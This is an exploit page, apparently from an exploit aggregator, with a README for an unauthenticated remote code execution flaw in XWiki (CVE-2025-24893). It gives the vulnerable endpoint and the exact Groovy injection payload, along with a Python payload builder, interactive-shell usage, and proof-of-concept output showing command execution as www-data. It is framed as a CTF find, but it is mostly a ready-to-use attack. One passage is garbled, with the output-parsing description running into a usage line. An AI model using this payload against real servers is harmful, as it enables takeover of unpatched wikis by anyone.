Exploit for Code Injection in Xwiki CVE-2025-24893

Name: Exploit for Code Injection in Xwiki CVE-2025-24893
Rating: 5 (114 reviews)
2026-04-16 | CVSS 9.8
## https://sploitus.com/exploit?id=2B1B9311-C593-5EBF-A179-57FC0C75C7F4
# CVE-2025-24893 — XWiki SSTI Remote Code Execution

## Overview

| Field | Details |
|---|---|
| **CVE** | CVE-2025-24893 |
| **Software** | XWiki |
| **Vulnerability** | Server-Side Template Injection (SSTI) → RCE |
| **Authentication** | Not required |
| **CVSS Score** | Critical |
| **Context** | Discovered during HackTheBox CTF |

## Description

XWiki exposes a `SolrSearch` endpoint (`/xwiki/bin/get/Main/SolrSearch`) that renders user-supplied input through the Groovy template engine without sanitization. An unauthenticated attacker can inject a Groovy expression via the `text` query parameter, achieving Remote Code Execution on the underlying server.

## Technical Details

### Vulnerable Endpoint

```
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=
```

### Injection Mechanism

The `text` parameter is embedded directly into an XWiki macro context and evaluated by the Groovy engine. The injection escapes the template context using `}}}` and opens an `{{async}}{{groovy}}` block:

```
}}}{{async async=false}}{{groovy}}println("".execute().text){{/groovy}}{{/async}}
```

The output is reflected in the RSS response body and can be extracted via regex.

### Payload Structure

```python
payload = '}}}{{async async=false}}{{groovy}}println("' + command + '".execute().text){{/groovy}}{{/async}}'
```

The response is XML/RSS — command output appears between `[}}}` and `] [-p PORT] [-s] [-i | -c COMMAND]
```

| Flag | Description |
|---|---|
| `-t` | Target hostname or IP |
| `-p` | Port (default: 80) |
| `-s` | Use HTTPS |
| `-i` | Interactive shell mode |
| `-c` | Single command execution |
| `-v` | Verbose output |

### Examples

```bash
# Single command
python3 exploit.py -t wiki.target.htb -c "id"

# Interactive shell
python3 exploit.py -t wiki.target.htb -i

# HTTPS on custom port
python3 exploit.py -t wiki.target.htb -p 443 -s -i
```

## Dependencies

```bash
pip install requests termcolor
```

## Proof of Concept

```
$ python3 exploit.py -t wiki.editor.htb -c "id"
[*] Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## References

- [XWiki Official Advisory](https://jira.xwiki.org)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)